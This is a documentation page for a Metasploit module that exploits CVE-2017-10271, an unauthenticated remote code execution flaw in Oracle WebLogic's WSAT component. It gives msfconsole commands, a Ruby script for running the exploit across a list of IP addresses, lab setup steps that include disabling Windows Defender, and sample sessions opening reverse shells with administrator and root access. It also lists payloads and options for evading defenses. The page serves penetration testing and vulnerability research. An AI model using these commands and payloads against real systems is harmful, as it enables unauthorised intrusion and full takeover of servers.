Oracle WebLogic wls-wsat Component Deserialization RCE - Metasploit


This page contains detailed information about how to use the exploit/multi/http/oracle_weblogic_wsat_deserialization_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Oracle WebLogic wls-wsat Component Deserialization RCE
Module: exploit/multi/http/oracle_weblogic_wsat_deserialization_rce
Source code: modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
Disclosure date: 2017-10-19
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix, Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 7001, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2017-10271

The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check and will not be used when executing the exploit itself.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using oracle_weblogic_wsat_deserialization_rce against a single host

Normally, you can use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce this way:

msf > use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce
msf exploit(oracle_weblogic_wsat_deserialization_rce) > show targets
    ... a list of targets ...
msf exploit(oracle_weblogic_wsat_deserialization_rce) > set TARGET target-id
msf exploit(oracle_weblogic_wsat_deserialization_rce) > show options
    ... show and set options ...
msf exploit(oracle_weblogic_wsat_deserialization_rce) > exploit

Using oracle_weblogic_wsat_deserialization_rce against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your oracle_weblogic_wsat_deserialization_rce will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Description


This module works leverages CVE-2017-10271 against Oracle WebLogic Server's Web Service Atomic Transaction API a XML SOAP request to create a java.lang.ProcessBuilder object to provide unauthenticated arbitrary command execution. A command line can be acquired through the use of cmd/unix/reverse_python.

Note that the TARGET must be set to match either a Windows or Unix-based host. If the TARGET variable is set improperly, a log entry will be generated on a vulnerable server, but the server will not crash. For example, a Linux payload sent to a Windows server will output:

java.io.IOException: Cannot run program "/bin/sh": CreateProcess error=2, The system cannot find the file specified
Continuing ...

Vulnerable Application


Oracle WebLogic server versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0 with access to Web Services Atomic Transaction (WS-AT) endpoints are vulnerable to unauthenticated arbitrary command execution.

Windows: Setting up a vulnerable application

We successfully tested this exploit against a fully-patched, Windows 10 (x64) target. Since WebLogic is resource intensive, consider providing four cores and 8GB of RAM.

  1. Download Oracle WebLogic Server 10.3.6, using the "Windows x86 with 32-bit JVM" (wls1036_win32.exe).
  2. Run the installer. (See [here] for detailed instructions.) You may be prompted to install a Java Development Kit (JDK). JDK 8u151 x64 was verified working.
  3. Windows Defender will block the payload from executing, so you may need to temporarily or permanently disable it.
  4. Run the configuration wizard and create a new weblogic domain. Domain names and credentials are irrelevant. At the conclusion of the wizard, click "Start Admin Server".
  5. The startWebLogic.cmd should run immediately after the installer and present logging output. Once running, the window should output a line similar to the following <Jan 11, 2018 1:30:49 PM CST> <Notice> <WebLogicServer> <BEA-000365> <Server state changed to RUNNING> <Jan 11, 2018 1:30:49 PM CST> <Notice> <WebLogicServer> <BEA-000360> <Server started in RUNNING mode>

Windows: Attacking a vulnerable application

Attack the above Windows server using the exploit/multi/http/oracle_weblogic_wsat_deserialization_rce:

msf > use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce
msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set RHOST [IP address of your target]
msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set TARGET 0
msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set PAYLOAD cmd/windows/reverse_powershell
msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set LHOST [IP address of your attacker]
msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > run

[*] Started reverse TCP handler on 192.168.108.1:4444
[*] Command shell session 1 opened (192.168.108.1:4444 -> 192.168.108.132:50060) at 2018-01-11 11:48:16 -0600

Microsoft Windows [Version 10.0.16299.192]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\Oracle\Middleware\user_projects\domains\admindomain>whoami
weblogic-server\Administrator

Unix: Setting up a vulnerable environment

  1. If necessary, install Docker.io. These instructions were tested on a Kali 2017.3 VM:
apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D
echo 'deb https://apt.dockerproject.org/repo debian-stretch main' > /etc/apt/sources.list.d/docker.list
apt update
apt-get install docker-engine
service docker start
docker run hello-world
  1. Install a container running Ubuntu 16.04 and WebLogic 10.3.6.0: docker run -d -p7001:7001 -p80:7001 kkirsche/cve-2017-10271

  2. Confirm that the container is up. docker ps

Unix: Attacking a vulnerable application

Attack the above Unix server using the exploit/multi/http/oracle_weblogic_wsat_deserialization_rce:

msf > use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce
msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set RHOST [IP address of the target]
msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set TARGET 1
msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set PAYLOAD cmd/unix/reverse_python
msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set LHOST [IP address of the attacker]
msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > run

[*] Started reverse TCP handler on 192.168.108.1:4444
[*] Command shell session 5 opened (192.168.108.1:4444 -> 192.168.108.129:51312) at 2018-01-11 11:46:49 -0600

id
uid=0(root) gid=0(root) groups=0(root)

Credits


Documentation originally written by Aaron Soto (@asoto-r7) and was edited by Kevin Kirsche (@kkirsche).

Go back to menu.

Msfconsole Usage


Here is how the multi/http/oracle_weblogic_wsat_deserialization_rce exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce

[*] No payload configured, defaulting to cmd/windows/powershell_reverse_tcp
msf6 exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > show info

       Name: Oracle WebLogic wls-wsat Component Deserialization RCE
     Module: exploit/multi/http/oracle_weblogic_wsat_deserialization_rce
   Platform: Windows, Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-10-19

Provided by:
  Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>
  Luffin
  Alexey Tyurin
  Federico Dotta

Available targets:
  Id  Name
  --  ----
  0   Windows Command payload
  1   Unix Command payload

Check supported:
  No

Basic options:
  Name       Current Setting                Required  Description
  ----       ---------------                --------  -----------
  Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      7001                           yes       The remote port that the WebLogic WSAT endpoint listens on (TCP)
  SSL        false                          no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /wls-wsat/CoordinatorPortType  yes       The base path to the WebLogic WSAT endpoint
  TIMEOUT    20.0                           yes       The timeout value of requests to RHOST
  VHOST                                     no        HTTP server virtual host

Payload information:

Description:
  The Oracle WebLogic WLS WSAT Component is vulnerable to a XML 
  Deserialization remote code execution vulnerability. Supported 
  versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 
  and 12.2.1.2.0. Discovered by Alexey Tyurin of ERPScan and Federico 
  Dotta of Media Service. Please note that SRVHOST, SRVPORT, 
  HTTP_DELAY, URIPATH and related HTTP Server variables are only used 
  when executing a check and will not be used when executing the 
  exploit itself.

References:
  https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html
  https://github.com/Luffin/CVE-2017-10271
  https://github.com/kkirsche/CVE-2017-10271
  https://nvd.nist.gov/vuln/detail/CVE-2017-10271
  https://www.exploit-db.com/exploits/43458

Module Options


This is a complete list of options available in the multi/http/oracle_weblogic_wsat_deserialization_rce exploit:

msf6 exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > show options

Module options (exploit/multi/http/oracle_weblogic_wsat_deserialization_rce):

   Name       Current Setting                Required  Description
   ----       ---------------                --------  -----------
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      7001                           yes       The remote port that the WebLogic WSAT endpoint listens on (TCP)
   SSL        false                          no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /wls-wsat/CoordinatorPortType  yes       The base path to the WebLogic WSAT endpoint
   TIMEOUT    20.0                           yes       The timeout value of requests to RHOST
   VHOST                                     no        HTTP server virtual host

Payload options (cmd/windows/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LHOST         192.168.204.3    yes       The listen address (an interface may be specified)
   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
   LPORT         4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows Command payload

Advanced Options


Here is a complete list of advanced options supported by the multi/http/oracle_weblogic_wsat_deserialization_rce exploit:

msf6 exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > show advanced

Module advanced options (exploit/multi/http/oracle_weblogic_wsat_deserialization_rce):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/windows/powershell_reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   HandlerSSLCert                               no        Path to a SSL certificate in unified PEM format
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/oracle_weblogic_wsat_deserialization_rce module can exploit:

msf6 exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Command payload
   1   Unix Command payload

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/oracle_weblogic_wsat_deserialization_rce exploit:

msf6 exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/windows/adduser                                  normal  No     Windows Execute net user /ADD CMD
   1   payload/cmd/windows/bind_lua                                 normal  No     Windows Command Shell, Bind TCP (via Lua)
   2   payload/cmd/windows/bind_perl                                normal  No     Windows Command Shell, Bind TCP (via Perl)
   3   payload/cmd/windows/bind_perl_ipv6                           normal  No     Windows Command Shell, Bind TCP (via perl) IPv6
   4   payload/cmd/windows/bind_ruby                                normal  No     Windows Command Shell, Bind TCP (via Ruby)
   5   payload/cmd/windows/download_eval_vbs                        normal  No     Windows Executable Download and Evaluate VBS
   6   payload/cmd/windows/download_exec_vbs                        normal  No     Windows Executable Download and Execute (via .vbs)
   7   payload/cmd/windows/generic                                  normal  No     Windows Command, Generic Command Execution
   8   payload/cmd/windows/powershell_bind_tcp                      normal  No     Windows Interactive Powershell Session, Bind TCP
   9   payload/cmd/windows/powershell_reverse_tcp                   normal  No     Windows Interactive Powershell Session, Reverse TCP
   10  payload/cmd/windows/reverse_lua                              normal  No     Windows Command Shell, Reverse TCP (via Lua)
   11  payload/cmd/windows/reverse_perl                             normal  No     Windows Command, Double Reverse TCP Connection (via Perl)
   12  payload/cmd/windows/reverse_powershell                       normal  No     Windows Command Shell, Reverse TCP (via Powershell)
   13  payload/cmd/windows/reverse_ruby                             normal  No     Windows Command Shell, Reverse TCP (via Ruby)
   14  payload/generic/custom                                       normal  No     Custom Payload
   15  payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   16  payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/oracle_weblogic_wsat_deserialization_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>
  • Luffin
  • Alexey Tyurin
  • Federico Dotta

Version


This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.